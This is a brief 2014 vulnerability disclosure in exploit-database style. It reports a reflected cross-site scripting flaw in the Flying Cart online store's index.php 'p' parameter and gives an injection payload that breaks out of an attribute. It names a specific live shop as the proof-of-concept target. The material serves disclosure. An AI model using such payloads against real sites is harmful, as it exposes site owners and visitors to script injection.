Sites using Flying Cart suffer from a cross site scripting vulnerability. Note that this finding houses site-specific data.
94e71e6c1f57749ac86022d71ebb2690578d7642017877347bfa8c2e2f9cfb4e
# Cross Site Scripting on Online Store ~ Flying Cart
# Risk: Low
# CWE number: CWE-79
# Date: 19/05/2014
# Vendor: Flying Cart
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: index.php
# Exploit: http:/host/index.php?p=[xss]
# PoC:
[-]Target: http://www.shamrockroseneedlework.com
[-]Vuln. File: /index.php?p=
[-]Exploit: "><marquee>Vulnerable</marquee>
# Thank's